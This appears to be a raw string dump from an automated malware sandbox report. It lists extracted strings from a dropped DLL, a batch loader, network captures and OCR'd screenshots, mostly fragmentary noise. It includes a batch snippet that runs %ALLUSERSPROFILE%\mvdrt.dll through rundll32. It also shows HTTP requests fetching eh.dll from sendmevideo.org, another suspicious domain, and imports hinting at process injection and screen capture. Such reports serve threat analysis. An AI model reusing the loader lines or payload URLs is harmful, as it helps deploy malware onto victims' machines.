Ansi based on Dropped File (carved_0.dll.1509628513544)

.text$mn

Ansi based on Dropped File (carved_0.dll.1509628513544)

12493

Unicode based on Dropped File (carved_0.dll.1509628513544)

7gu"lV

Ansi based on Dropped File (carved_0.dll.1509628513544)

<xI1n

Ansi based on Dropped File (carved_0.dll.1509628513544)

@.data

Ansi based on Dropped File (carved_0.dll.1509628513544)

@.reloc

Ansi based on Dropped File (carved_0.dll.1509628513544)

`.rdata

Ansi based on Dropped File (carved_0.dll.1509628513544)

aH$in

Ansi based on Dropped File (carved_0.dll.1509628513544)

ation

Unicode based on Dropped File (carved_0.dll.1509628513544)

c9o:m

Ansi based on Dropped File (carved_0.dll.1509628513544)

CompanyName

Unicode based on Dropped File (carved_0.dll.1509628513544)

DGMNOEP

Ansi based on Dropped File (carved_0.dll.1509628513544)

e?OQ&B/v

Ansi based on Dropped File (carved_0.dll.1509628513544)

FileDescription

Unicode based on Dropped File (carved_0.dll.1509628513544)

FileVersion

Unicode based on Dropped File (carved_0.dll.1509628513544)

GdipFree

Ansi based on Dropped File (carved_0.dll.1509628513544)

GetExitCodeProcess

Ansi based on Dropped File (carved_0.dll.1509628513544)

HeapFree

Ansi based on Dropped File (carved_0.dll.1509628513544)

HVPxH

Ansi based on Dropped File (carved_0.dll.1509628513544)

iginalFilename

Unicode based on Dropped File (carved_0.dll.1509628513544)

image/jpeg

Unicode based on Dropped File (carved_0.dll.1509628513544)

InternalName

Unicode based on Dropped File (carved_0.dll.1509628513544)

LegalCopyright

Unicode based on Dropped File (carved_0.dll.1509628513544)

lstrlenA

Ansi based on Dropped File (carved_0.dll.1509628513544)

lstrlenW

Ansi based on Dropped File (carved_0.dll.1509628513544)

nector

Unicode based on Dropped File (carved_0.dll.1509628513544)

oductVersion

Unicode based on Dropped File (carved_0.dll.1509628513544)

ompany

Unicode based on Dropped File (carved_0.dll.1509628513544)

ProductName

Unicode based on Dropped File (carved_0.dll.1509628513544)

q4V[x%

Ansi based on Dropped File (carved_0.dll.1509628513544)

ReadFile

Ansi based on Dropped File (carved_0.dll.1509628513544)

s "%s", %s

Unicode based on Dropped File (carved_0.dll.1509628513544)

Sleep

Ansi based on Dropped File (carved_0.dll.1509628513544)

StringFileInfo

Unicode based on Dropped File (carved_0.dll.1509628513544)

VarFileInfo

Unicode based on Dropped File (carved_0.dll.1509628513544)

VS_VERSION_INFO

Unicode based on Dropped File (carved_0.dll.1509628513544)

xOm~_O

Ansi based on Dropped File (carved_0.dll.1509628513544)

zO-}@t

Ansi based on Dropped File (carved_0.dll.1509628513544)

|O-}@~

Ansi based on Dropped File (carved_0.dll.1509628513544)

if NOT exist %inst_pck % (exit)

Ansi based on Dropped File (mvdrt.bat)

set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"

Ansi based on Dropped File (mvdrt.bat)

set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"if NOT exist %inst_pck % (exit)start rundll32.exe %inst_pck %,#1

Ansi based on Dropped File (mvdrt.bat)

start rundll32.exe %inst_pck %,#1

Ansi based on Dropped File (mvdrt.bat)

*.gvt1.com

Ansi based on PCAP Processing (network.pcap)

*.gvt2.com

Ansi based on PCAP Processing (network.pcap)

California1

Ansi based on PCAP Processing (network.pcap)

Google Inc1

Ansi based on PCAP Processing (network.pcap)

Google Inc1%0#

Ansi based on PCAP Processing (network.pcap)

google.com

Ansi based on PCAP Processing (network.pcap)

urchin.c(

Ansi based on PCAP Processing (network.pcap)

www.goo.gl

Ansi based on PCAP Processing (network.pcap)

*.android.com

Ansi based on PCAP Processing (network.pcap)

*.gstatic.com

Ansi based on PCAP Processing (network.pcap)

*.youtube.com

Ansi based on PCAP Processing (network.pcap)

020521040000Z

Ansi based on PCAP Processing (network.pcap)

170522113237Z

Ansi based on PCAP Processing (network.pcap)

171024090717Z

Ansi based on PCAP Processing (network.pcap)

171030134419Z

Ansi based on PCAP Processing (network.pcap)

171229000000Z0f1

Ansi based on PCAP Processing (network.pcap)

180821040000Z0B1

Ansi based on PCAP Processing (network.pcap)

181231235959Z0I1

Ansi based on PCAP Processing (network.pcap)

GeoTrust Inc.1

Ansi based on PCAP Processing (network.pcap)

lc-lZQrRT6g./

Ansi based on PCAP Processing (network.pcap)

Mountain View1

Ansi based on PCAP Processing (network.pcap)

|p&h@JrRe

Ansi based on PCAP Processing (network.pcap)

dO3x\BoX

Ansi based on PCAP Processing (network.pcap)

!&+eGdxeGdxeGdx

Ansi based on PCAP Processing (network.pcap)

!This program cannot be run in DOS mode.$

Ansi based on PCAP Processing (network.pcap)

#c2@XbOvm

Ansi based on PCAP Processing (network.pcap)

$Equifax Secure Certificate Authority0

Ansi based on PCAP Processing (network.pcap)

$http://g.symcb.com/crls/gtglobal.crl0!

Ansi based on PCAP Processing (network.pcap)

)@_^J26)6

Ansi based on PCAP Processing (network.pcap)

)http://crl.geotrust.com/crls/secureca.crl0N

Ansi based on PCAP Processing (network.pcap)

*.appengine.google.com

Ansi based on PCAP Processing (network.pcap)

*.cloud.google.com

Ansi based on PCAP Processing (network.pcap)

*.db833953.google.cn

Ansi based on PCAP Processing (network.pcap)

*.gcp.gvt2.com

Ansi based on PCAP Processing (network.pcap)

*.google-analytics.com

Ansi based on PCAP Processing (network.pcap)

*.google.ca

Ansi based on PCAP Processing (network.pcap)

*.google.cl

Ansi based on PCAP Processing (network.pcap)

*.google.co.in

Ansi based on PCAP Processing (network.pcap)

*.google.co.jp

Ansi based on PCAP Processing (network.pcap)

*.google.co.uk

Ansi based on PCAP Processing (network.pcap)

*.google.com

Ansi based on PCAP Processing (network.pcap)

*.google.com.ar

Ansi based on PCAP Processing (network.pcap)

*.google.com.au

Ansi based on PCAP Processing (network.pcap)

*.google.com.br

Ansi based on PCAP Processing (network.pcap)

*.google.com.co

Ansi based on PCAP Processing (network.pcap)

*.google.com.mx

Ansi based on PCAP Processing (network.pcap)

*.google.com.tr

Ansi based on PCAP Processing (network.pcap)

*.google.com.vn

Ansi based on PCAP Processing (network.pcap)

*.google.com0Y0

Ansi based on PCAP Processing (network.pcap)

*.google.de

Ansi based on PCAP Processing (network.pcap)

*.google.es

Ansi based on PCAP Processing (network.pcap)

*.google.fr

Ansi based on PCAP Processing (network.pcap)

*.google.hu

Ansi based on PCAP Processing (network.pcap)

*.google.it

Ansi based on PCAP Processing (network.pcap)

*.google.nl

Ansi based on PCAP Processing (network.pcap)

*.google.pl

Ansi based on PCAP Processing (network.pcap)

*.google.pt

Ansi based on PCAP Processing (network.pcap)

*.googleadapis.com

Ansi based on PCAP Processing (network.pcap)

*.googleapis.cn

Ansi based on PCAP Processing (network.pcap)

*.googlecommerce.com

Ansi based on PCAP Processing (network.pcap)

*.googlevideo.com

Ansi based on PCAP Processing (network.pcap)

*.gstatic.cn

Ansi based on PCAP Processing (network.pcap)

*.metric.gstatic.com

Ansi based on PCAP Processing (network.pcap)

*.urchin.com

Ansi based on PCAP Processing (network.pcap)

*.url.google.com

Ansi based on PCAP Processing (network.pcap)

*.youtube-nocookie.com

Ansi based on PCAP Processing (network.pcap)

*.youtubeeducation.com

Ansi based on PCAP Processing (network.pcap)

*.ytimg.com

Ansi based on PCAP Processing (network.pcap)

-https://www.geotrust.com/resources/repository0

Ansi based on PCAP Processing (network.pcap)

.rdata$zzzdbg

Ansi based on PCAP Processing (network.pcap)

0"0?0P0g0y0

Ansi based on PCAP Processing (network.pcap)

042dsDl>

Ansi based on PCAP Processing (network.pcap)

2-01-3cf7-0009

Ansi based on PCAP Processing (network.pcap)

21171006134419Z0t1

Ansi based on PCAP Processing (network.pcap)

2D2X2i2w2

Ansi based on PCAP Processing (network.pcap)

3*313?3T3<4N4

Ansi based on PCAP Processing (network.pcap)

3U3k3s3z3

Ansi based on PCAP Processing (network.pcap)

4"4/4<4N4

Ansi based on PCAP Processing (network.pcap)

4.5O5^5l5z5

Ansi based on PCAP Processing (network.pcap)

5"5/5<5K5x5

Ansi based on PCAP Processing (network.pcap)

6&6^6p6}6

Ansi based on PCAP Processing (network.pcap)

7%858B8P8a8

Ansi based on PCAP Processing (network.pcap)

7A7S7`7m7

Ansi based on PCAP Processing (network.pcap)

< <.<R<]<k<

Ansi based on PCAP Processing (network.pcap)

<0<;<P<X<`<~<

Ansi based on PCAP Processing (network.pcap)

<9SZ}}iDc

Ansi based on PCAP Processing (network.pcap)

>/>6>P>i>q>

Ansi based on PCAP Processing (network.pcap)

?_O-~\Tn`z&{(

Ansi based on PCAP Processing (network.pcap)

ADVAPI32.dll

Ansi based on PCAP Processing (network.pcap)

android.clients.google.com

Ansi based on PCAP Processing (network.pcap)

android.com

Ansi based on PCAP Processing (network.pcap)

authroot.stl

Ansi based on PCAP Processing (network.pcap)

aV!uRQyxX'h

Ansi based on PCAP Processing (network.pcap)

cfootprint

Ansi based on PCAP Processing (network.pcap)

CloseHandle

Ansi based on PCAP Processing (network.pcap)

CreateDirectoryW

Ansi based on PCAP Processing (network.pcap)

CreateFileMappingA

Ansi based on PCAP Processing (network.pcap)

CreateFileW

Ansi based on PCAP Processing (network.pcap)

CreateMutexA

Ansi based on PCAP Processing (network.pcap)

CreateRemoteThread

Ansi based on PCAP Processing (network.pcap)

CreateThread

Ansi based on PCAP Processing (network.pcap)

CreateToolhelp32Snapshot

Ansi based on PCAP Processing (network.pcap)

CRYPT32.dll

Ansi based on PCAP Processing (network.pcap)

CryptBinaryToStringA

Ansi based on PCAP Processing (network.pcap)

CryptStringToBinaryA

Ansi based on PCAP Processing (network.pcap)

D;%4L<#laPR:

Ansi based on PCAP Processing (network.pcap)

DeleteFileW

Ansi based on PCAP Processing (network.pcap)

developer.android.google.cn

Ansi based on PCAP Processing (network.pcap)

developers.android.google.cn

Ansi based on PCAP Processing (network.pcap)

DisableThreadLibraryCalls

Ansi based on PCAP Processing (network.pcap)

DispatchMessageA

Ansi based on PCAP Processing (network.pcap)

downloadwindowsupdate

Ansi based on PCAP Processing (network.pcap)

e9:(H$.7E

Ansi based on PCAP Processing (network.pcap)

Equifax1-0+

Ansi based on PCAP Processing (network.pcap)

eWZgpFj&

Ansi based on PCAP Processing (network.pcap)

E{j3OMWrk

Ansi based on PCAP Processing (network.pcap)

fC7:`FiHP=n) 0mT5

Ansi based on PCAP Processing (network.pcap)

FreeLibrary

Ansi based on PCAP Processing (network.pcap)

fydGdxRicheGdx

Ansi based on PCAP Processing (network.pcap)

GdipAlloc

Ansi based on PCAP Processing (network.pcap)

GdipCloneImage

Ansi based on PCAP Processing (network.pcap)

GdipCreateBitmapFromHBITMAP

Ansi based on PCAP Processing (network.pcap)

GdipDisposeImage

Ansi based on PCAP Processing (network.pcap)

GdipGetImageEncoders

Ansi based on PCAP Processing (network.pcap)

GdipGetImageEncodersSize

Ansi based on PCAP Processing (network.pcap)

gdiplus.dll

Ansi based on PCAP Processing (network.pcap)

GdiplusShutdown

Ansi based on PCAP Processing (network.pcap)

GdiplusStartup

Ansi based on PCAP Processing (network.pcap)

GdipSaveImageToStream

Ansi based on PCAP Processing (network.pcap)

GeoTrust Global CA0

Ansi based on PCAP Processing (network.pcap)

GET /dh2025e/eee.txt HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive

Ansi based on PCAP Processing (network.pcap)

GET /dh2025e/eh.dll HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive!

Ansi based on PCAP Processing (network.pcap)

GetAdaptersAddresses

Ansi based on PCAP Processing (network.pcap)

GetCurrentProcess

Ansi based on PCAP Processing (network.pcap)

GetExitCodeP!

Ansi based on PCAP Processing (network.pcap)

GetExitCodeThread

Ansi based on PCAP Processing (network.pcap)

GetFileSize

Ansi based on PCAP Processing (network.pcap)

GetLastError

Ansi based on PCAP Processing (network.pcap)

GetMessageA

Ansi based on PCAP Processing (network.pcap)

GetModuleHandleA

Ansi based on PCAP Processing (network.pcap)

GetPrivateProfileStringW

Ansi based on PCAP Processing (network.pcap)

GetProcAddress

Ansi based on PCAP Processing (network.pcap)

GetProcessHeap

Ansi based on PCAP Processing (network.pcap)

GetSystemInfo

Ansi based on PCAP Processing (network.pcap)

GetSystemMetrics

Ansi based on PCAP Processing (network.pcap)

GetSystemTimeAsFileTime

Ansi based on PCAP Processing (network.pcap)

GetTickCount

Ansi based on PCAP Processing (network.pcap)

GetVersionExA

Ansi based on PCAP Processing (network.pcap)

GetVolumeInformationW

Ansi based on PCAP Processing (network.pcap)

gI$vV~ST

Ansi based on PCAP Processing (network.pcap)

Google Internet Authority G20

Ansi based on PCAP Processing (network.pcap)

google-analytics.com

Ansi based on PCAP Processing (network.pcap)

googlecommerce.com

Ansi based on PCAP Processing (network.pcap)

HeapAlloc

Ansi based on PCAP Processing (network.pcap)

HeapReAlloc

Ansi based on PCAP Processing (network.pcap)

http://clients1.google.com/ocsp0

Ansi based on PCAP Processing (network.pcap)

http://g.symcd.com0

Ansi based on PCAP Processing (network.pcap)

http://pki.google.com/GIAG2.crl0

Ansi based on PCAP Processing (network.pcap)

http://pki.google.com/GIAG2.crt0+

Ansi based on PCAP Processing (network.pcap)

HttpOpenRequestA

Ansi based on PCAP Processing (network.pcap)

HttpQueryInfoA

Ansi based on PCAP Processing (network.pcap)

HttpSendRequestA

Ansi based on PCAP Processing (network.pcap)

iK"4PLp<9SZ|c

Ansi based on PCAP Processing (network.pcap)

InternetCloseHandle

Ansi based on PCAP Processing (network.pcap)

InternetConnectA

Ansi based on PCAP Processing (network.pcap)

InternetOpenA

Ansi based on PCAP Processing (network.pcap)

InternetQueryOptionA

Ansi based on PCAP Processing (network.pcap)

InternetReadFile

Ansi based on PCAP Processing (network.pcap)

InternetSetOptionA

Ansi based on PCAP Processing (network.pcap)

IPHLPAPI.DLL

Ansi based on PCAP Processing (network.pcap)

IsWow64Process

Ansi based on PCAP Processing (network.pcap)

iT&F~J~NV f<

Ansi based on PCAP Processing (network.pcap)

j Xj%^j2Z

Ansi based on PCAP Processing (network.pcap)

j%^j Xj2Z

Ansi based on PCAP Processing (network.pcap)

jPYjrXjof

Ansi based on PCAP Processing (network.pcap)

jw@cO9h!m

Ansi based on PCAP Processing (network.pcap)

KERNEL32.dll

Ansi based on PCAP Processing (network.pcap)

KIv%[Yz)kY

Ansi based on PCAP Processing (network.pcap)

KJ*jQL|N]

Ansi based on PCAP Processing (network.pcap)

lGawh'QwS

Ansi based on PCAP Processing (network.pcap)

LoadLibraryA

Ansi based on PCAP Processing (network.pcap)

LoadLibraryW

Ansi based on PCAP Processing (network.pcap)

lstrcmpiA

Ansi based on PCAP Processing (network.pcap)

M]D/Qs2a0

Ansi based on PCAP Processing (network.pcap)

MapViewOfFile

Ansi based on PCAP Processing (network.pcap)

MaV7lULoIT};>

Ansi based on PCAP Processing (network.pcap)

mB,oQOx<9SZ|c

Ansi based on PCAP Processing (network.pcap)

mu7hVBpsW

Ansi based on PCAP Processing (network.pcap)

MultiByteToWideChar

Ansi based on PCAP Processing (network.pcap)

mv1uPFnOn

Ansi based on PCAP Processing (network.pcap)

OpenFileMappingA

Ansi based on PCAP Processing (network.pcap)

Pi]M&zZ|c

Ansi based on PCAP Processing (network.pcap)

Process32First

Ansi based on PCAP Processing (network.pcap)

Process32Next

Ansi based on PCAP Processing (network.pcap)

PSSSSSSVS

Ansi based on PCAP Processing (network.pcap)

qD8AiIQg4

Ansi based on PCAP Processing (network.pcap)

QueryPerformanceCounter

Ansi based on PCAP Processing (network.pcap)

RegCloseKey

Ansi based on PCAP Processing (network.pcap)

RegCreateKeyExA

Ansi based on PCAP Processing (network.pcap)

RegOpenKeyExA

Ansi based on PCAP Processing (network.pcap)

RegQueryValueExA

Ansi based on PCAP Processing (network.pcap)

RegSetValueExA

Ansi based on PCAP Processing (network.pcap)

rFJKR|epcY`

Ansi based on PCAP Processing (network.pcap)

RY3d>"!~D

Ansi based on PCAP Processing (network.pcap)

satellitedeluxpanorama

Ansi based on PCAP Processing (network.pcap)

satellitedeluxpanorama.com

Ansi based on PCAP Processing (network.pcap)

satellitedeluxpanorama.com0

Ansi based on PCAP Processing (network.pcap)

secnt.dll

Ansi based on PCAP Processing (network.pcap)

Security1

Ansi based on PCAP Processing (network.pcap)

sendmevideo

Ansi based on PCAP Processing (network.pcap)

SetLastError

Ansi based on PCAP Processing (network.pcap)

SHELL32.dll

Ansi based on PCAP Processing (network.pcap)

SHGetSpecialFolderPathW

Ansi based on PCAP Processing (network.pcap)

source.android.google.cn

Ansi based on PCAP Processing (network.pcap)

t?f98t:j%YjsZj\f

Ansi based on PCAP Processing (network.pcap)

TranslateMessage

Ansi based on PCAP Processing (network.pcap)

UnmapViewOfFile

Ansi based on PCAP Processing (network.pcap)

USER32.dll

Ansi based on PCAP Processing (network.pcap)

VerifyVersionInfoW

Ansi based on PCAP Processing (network.pcap)

VerSetConditionMask

Ansi based on PCAP Processing (network.pcap)

VirtualAlloc

Ansi based on PCAP Processing (network.pcap)

VirtualFree

Ansi based on PCAP Processing (network.pcap)

vmzQC-J6%s - %lu

Ansi based on PCAP Processing (network.pcap)

WaitForSingleObject

Ansi based on PCAP Processing (network.pcap)

WideCharToMultiByte

Ansi based on PCAP Processing (network.pcap)

WININET.dll

Ansi based on PCAP Processing (network.pcap)

WriteFile

Ansi based on PCAP Processing (network.pcap)

WS2_32.dll

Ansi based on PCAP Processing (network.pcap)

wsprintfA

Ansi based on PCAP Processing (network.pcap)

wsprintfW

Ansi based on PCAP Processing (network.pcap)

XjiYjl_jaf

Ansi based on PCAP Processing (network.pcap)

xvGdxeGex>Gdx

Ansi based on PCAP Processing (network.pcap)

y6rC(Wuh5

Ansi based on PCAP Processing (network.pcap)

Y8\bOVRU0

Ansi based on PCAP Processing (network.pcap)

youtube.com

Ansi based on PCAP Processing (network.pcap)

youtubeeducation.com

Ansi based on PCAP Processing (network.pcap)

y}_{8r i{

Ansi based on PCAP Processing (network.pcap)

~C(g{.hHq

Ansi based on PCAP Processing (network.pcap)

Ansi based on Process Commandline (powershell.exe)

rasman

Ansi based on Runtime Data (powershell.exe )

RASMAN

Unicode based on Runtime Data (powershell.exe )

%ALLUSERSPROFILE%\mvdrt.dll,#1

Ansi based on Process Commandline (rundll32.exe)

AutoConfigURL

Unicode based on Runtime Data (rundll32.exe )

CryptSvc

Unicode based on Runtime Data (rundll32.exe )

cryptsvc

Unicode based on Runtime Data (rundll32.exe )

DefaultConnectionSettings

Unicode based on Runtime Data (rundll32.exe )

en-US

Unicode based on Runtime Data (rundll32.exe )

gpsvc

Unicode based on Runtime Data (rundll32.exe )

IETldDllVersionHigh

Unicode based on Runtime Data (rundll32.exe )

IETldDllVersionLow

Unicode based on Runtime Data (rundll32.exe )

IETldVersionHigh

Unicode based on Runtime Data (rundll32.exe )

IETldVersionLow

Unicode based on Runtime Data (rundll32.exe )

LanguageList

Unicode based on Runtime Data (rundll32.exe )

Network

Unicode based on Runtime Data (rundll32.exe )

ProxyEnable

Unicode based on Runtime Data (rundll32.exe )

ProxyOverride

Unicode based on Runtime Data (rundll32.exe )

ProxyServer

Unicode based on Runtime Data (rundll32.exe )

SavedLegacySettings

Unicode based on Runtime Data (rundll32.exe )

ServicesActive

Unicode based on Runtime Data (rundll32.exe )

StaleIETldCache

Unicode based on Runtime Data (rundll32.exe )

TLDUpdates

Unicode based on Runtime Data (rundll32.exe )

WpadDecision

Unicode based on Runtime Data (rundll32.exe )

WpadDecisionReason

Unicode based on Runtime Data (rundll32.exe )

WpadDecisionTime

Unicode based on Runtime Data (rundll32.exe )

WpadLastNetwork

Unicode based on Runtime Data (rundll32.exe )

WpadNetworkName

Unicode based on Runtime Data (rundll32.exe )

{09477111-DE61-43CD-A5AA-D9F7B489301F}

Unicode based on Runtime Data (rundll32.exe )

,__,,

Ansi based on Image Processing (screen_0.png)

?______J

Ansi based on Image Processing (screen_0.png)

_0,,J

Ansi based on Image Processing (screen_0.png)

_0_,,

Ansi based on Image Processing (screen_0.png)

_?m?J?_?_,q_?_,?_??_m??_?_v____,_,_

Ansi based on Image Processing (screen_0.png)

_m_m,,,

Ansi based on Image Processing (screen_0.png)

_pAyLoAD

Ansi based on Image Processing (screen_0.png)

SECU_

Ansi based on Image Processing (screen_0.png)

''-''

Ansi based on Image Processing (screen_3.png)

-'--'-

Ansi based on Image Processing (screen_3.png)

0___D',0_0___'_ee8_

Ansi based on Image Processing (screen_3.png)

_'iard__O

Ansi based on Image Processing (screen_3.png)

_::_::_

Ansi based on Image Processing (screen_3.png)

_;-_'_-_'',_'t-_-,t-_-,

Ansi based on Image Processing (screen_3.png)

___1i___'c_.crti_'._c_'c_

Ansi based on Image Processing (screen_3.png)

_______Find_

Ansi based on Image Processing (screen_3.png)

__Replace

Ansi based on Image Processing (screen_3.png)

_COpY

Ansi based on Image Processing (screen_3.png)

_l.8_0.ll_

Ansi based on Image Processing (screen_3.png)

_l__'_l_

Ansi based on Image Processing (screen_3.png)

_nnat

Ansi based on Image Processing (screen_3.png)

ab_in

Ansi based on Image Processing (screen_3.png)

again

Ansi based on Image Processing (screen_3.png)

C:_r_ramsmi_a_A_m_mSWard.ex

Ansi based on Image Processing (screen_3.png)

change

Ansi based on Image Processing (screen_3.png)

FOrmatPaintir

Ansi based on Image Processing (screen_3.png)

h_ailing_

Ansi based on Image Processing (screen_3.png)

In_ek

Ansi based on Image Processing (screen_3.png)

in_rnet_nne_an,

Ansi based on Image Processing (screen_3.png)

l_____:,_---_---_

Ansi based on Image Processing (screen_3.png)

la_r.

Ansi based on Image Processing (screen_3.png)

MH_Ward

Ansi based on Image Processing (screen_3.png)

o__0_

Ansi based on Image Processing (screen_3.png)

PageLayaut

Ansi based on Image Processing (screen_3.png)

Patte

Ansi based on Image Processing (screen_3.png)

Reference_

Ansi based on Image Processing (screen_3.png)

Review

Ansi based on Image Processing (screen_3.png)

Silict_

Ansi based on Image Processing (screen_3.png)

'''-''''''''''

Ansi based on Image Processing (screen_6.png)

,_,_.

Ansi based on Image Processing (screen_6.png)

7s9f__agla78_e_3s71saf_a84686a84g3f39O14aea7lda_6869d_

Ansi based on Image Processing (screen_6.png)

:___-,-

Ansi based on Image Processing (screen_6.png)

__''_''__

Ansi based on Image Processing (screen_6.png)

___'__

Ansi based on Image Processing (screen_6.png)

____8,0

Ansi based on Image Processing (screen_6.png)

_____

Ansi based on Image Processing (screen_6.png)

________

Ansi based on Image Processing (screen_6.png)

____ln

Ansi based on Image Processing (screen_6.png)

___P_

Ansi based on Image Processing (screen_6.png)

__g__

Ansi based on Image Processing (screen_6.png)

_a9i;

Ansi based on Image Processing (screen_6.png)

_diting

Ansi based on Image Processing (screen_6.png)

_i8_0_

Ansi based on Image Processing (screen_6.png)

AaBbc(

Ansi based on Image Processing (screen_6.png)

AaebccD(

Ansi based on Image Processing (screen_6.png)

Clipbaard

Ansi based on Image Processing (screen_6.png)

e_e'_

Ansi based on Image Processing (screen_6.png)

g_u__xx_,r_\_6

Ansi based on Image Processing (screen_6.png)

hangg

Ansi based on Image Processing (screen_6.png)

Hgad._nLHgad._n_

Ansi based on Image Processing (screen_6.png)

In_ik

Ansi based on Image Processing (screen_6.png)

iv_RiplaCiP

Ansi based on Image Processing (screen_6.png)

Mai_ing_

Ansi based on Image Processing (screen_6.png)

micr0c0ftw0rd

Ansi based on Image Processing (screen_6.png)

nNorma_nNosaci

Ansi based on Image Processing (screen_6.png)

PagiLayaut

Ansi based on Image Processing (screen_6.png)

Paragraph

Ansi based on Image Processing (screen_6.png)

Rifirinci_

Ansi based on Image Processing (screen_6.png)

Rivim

Ansi based on Image Processing (screen_6.png)

s__g,.

Ansi based on Image Processing (screen_6.png)

si_ict

Ansi based on Image Processing (screen_6.png)

SNle_

Ansi based on Image Processing (screen_6.png)

t___t____

Ansi based on Image Processing (screen_6.png)

w0rdc;

Ansi based on Image Processing (screen_6.png)

"Hw"w P^O;<aY`GkxmPY[g

Ansi based on Dropped File (~WRD0000.tmp)

$5caa`= &!Cd,E.y6CnHgs0_?V_Nw ,{5Iq{Bl(p_cdS|&PO\UbHcK)KjVkUSD2P

Ansi based on Dropped File (~WRD0000.tmp)

%?nu gPK!/]N word/theme/theme1.xmlY;4.[?%y

Ansi based on Dropped File (~WRD0000.tmp)

'j,'u8M#8M#8M

Ansi based on Dropped File (~WRD0000.tmp)

.:N#H

Ansi based on Dropped File (~WRD0000.tmp)

.MfIZUq"=loO.Y$m.+gAT!,MQH(XI\qZbaG;_K

Ansi based on Dropped File (~WRD0000.tmp)

.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!_DMtdocProps/core.xml (RN0}7Y`$jxD^uM[w+fL|sO;"uS@J*<'\K^T0,

Ansi based on Dropped File (~WRD0000.tmp)

/x#,/d}?eh7)mg;kk4Df2/wBmw4A^#FkPHxAt~9'ozWnMtVWkJlNWz^>\PK!yUword/document.xmlVKo8/@=X'udshj)rPXF$mwuqa>fIp_lJT *_o.+T0

Ansi based on Dropped File (~WRD0000.tmp)

0/EEa}@+Du7Lcc@M+.!}!$ OuRIdHA(1x$u#Qx2R*XLOP[nDY3+L!H?%kE

Ansi based on Dropped File (~WRD0000.tmp)

1`2"7BAoGm)TrJ(A^%>f+hOO3`=VEs9kA"(-$gkm,w"F,#SC`n[J(%

Ansi based on Dropped File (~WRD0000.tmp)

433j238bG*Dc=Iod%rD\'<DbQ|

Ansi based on Dropped File (~WRD0000.tmp)

49Ds7 !|V>7rtx3iQ!V$

Ansi based on Dropped File (~WRD0000.tmp)

5(FSrgC4YTrsB,i1j!u'66@AP\?F.sNlt<>=9^Q*pOC4Jew"i3!zCIa~.4K+}ip{:Z|cIy]?pkXN2

Ansi based on Dropped File (~WRD0000.tmp)

6iD_,|uZ^ty;!Y,}{C/h>PK!|;9"word/_rels/document.xml.rels (MO0&V]5-Sht

Ansi based on Dropped File (~WRD0000.tmp)

7PXd}Wt]tsso*UM\x@wAm`8TQkPp<Nw.4875TZ(ZG[iF?h;gy)vPK!5Iword/settings.xmlVn8}/`yIoSmQ@IM7;$(ihOg~+M_FE

Ansi based on Dropped File (~WRD0000.tmp)

9;5AT7_CMjFD4x#@74x#@2x#XdmZo,To

Ansi based on Dropped File (~WRD0000.tmp)

9AMFP97ex#@CAoDD74x#@2x#XdmZo,To

Ansi based on Dropped File (~WRD0000.tmp)

9AMFPoJ5x#@07_9W%M7"q."kx#@dyx#@dmPl(xS

Ansi based on Dropped File (~WRD0000.tmp)

='I ZRPGQh6\lFXt778Co5(h5({pm[{v?~

Ansi based on Dropped File (~WRD0000.tmp)

=1d){%}wofjQr??.z/L?1Z?o)IK9Ka:6|'1M1%Y,P,#X'kD7_rH&.+$+I'<ewZ0t=G5w2(ql|FQ&Q3,=cXWXv=%3[H+

Ansi based on Dropped File (~WRD0000.tmp)

=I]B,lD@=VSk(]&(f2:tSiX30IQbU`MZ9UBrFL+b2cyP.

Ansi based on Dropped File (~WRD0000.tmp)

>`~{`PNfQS];6#6jwVt0xrQCM_-oiv

Ansi based on Dropped File (~WRD0000.tmp)

>FY!OGPRW<s@4S:>Y;^UW+Kn|6SD3EG-XVNinjkR}v!{GNGVlenomUCIw]]w-]rU|!zvzm{:BkMzfA(5'BbaPSK\-L`b$AK8JI,

Ansi based on Dropped File (~WRD0000.tmp)

>iWb[gDhzJBewmW&, fcmA@F[&G/3bj<ML@F[Kjb>g??ky.,z22pBWA=+3SA:*P.v5~ol8S-wt`LET

Ansi based on Dropped File (~WRD0000.tmp)

@%z:pov<t..P/LmTLz5qdFhMFhDFh$wD##1-\*:Zw"O(t]F=$,8epj9=\,Y"vgF;{&

Ansi based on Dropped File (~WRD0000.tmp)

\JeL{QJ*[r]SI2%x.MHNRtfgV@

Ansi based on Dropped File (~WRD0000.tmp)

]3j%L]CBr#7@>KVkZ^-d ukW.+"p!

Ansi based on Dropped File (~WRD0000.tmp)

^@5)mDYq/bfdMRMVs*Bc.cl%(r]3,R~<!

Ansi based on Dropped File (~WRD0000.tmp)

^aQFldee2nVA=t8`7M:liA%JE\F/ }D\.zrSu1FxlEmZUAs7g?d.1?{:.|hc

Ansi based on Dropped File (~WRD0000.tmp)

Bn9h{<my-'=ZFUjpTAJ?QX

Ansi based on Dropped File (~WRD0000.tmp)

bTc+28aBU64."=*+;?GNHA7K<]P;~T<x4:=GqJ.,NdTQ}<G37p,Mda03IIt$nXrgG$iXYPI%I?c5.RWlpBb5T!u7+U Kghj~5(QV

Ansi based on Dropped File (~WRD0000.tmp)

d%HT`r-S8d%w=d[Zh-BFU4n~]:_z0vRwq!<dqGvvrk

Ansi based on Dropped File (~WRD0000.tmp)

DZf|V.SR'H&.5SXS5tH.KbDytNH/9(12{g%?

Ansi based on Dropped File (~WRD0000.tmp)

fao.b*lIrj),l0%b

Ansi based on Dropped File (~WRD0000.tmp)

Ft#6"w9:0t[E[?N1~piMPir1/C4^C,_R&+Hd\CBwPV*h"|x0gV5iy$4V"e9BA)jT(y>vwv(SLqWUDXQw4S^0F"\gsldYdLuHc9>(hVD5{A7tPK!N_rels/.rels (JAa}7

Ansi based on Dropped File (~WRD0000.tmp)

g$mg49z'c'Yy&h-]IB[nxG!!i[1dsjT"5U$Z,K_M-sdC""h`#BE=x56f}P^Hjl9*T`<Oy`#@P~x2d$6dy%t@`'ut|+{{W>d7\iIv

Ansi based on Dropped File (~WRD0000.tmp)

g/ox(-R,vj,'I8M8M#8M

Ansi based on Dropped File (~WRD0000.tmp)

G_)Ew_9_8]ROu!}=I]?re

Ansi based on Dropped File (~WRD0000.tmp)

Gino/<<1A$>"f3\TISWY

Ansi based on Dropped File (~WRD0000.tmp)

h%IX`/*CQGw@(

Ansi based on Dropped File (~WRD0000.tmp)

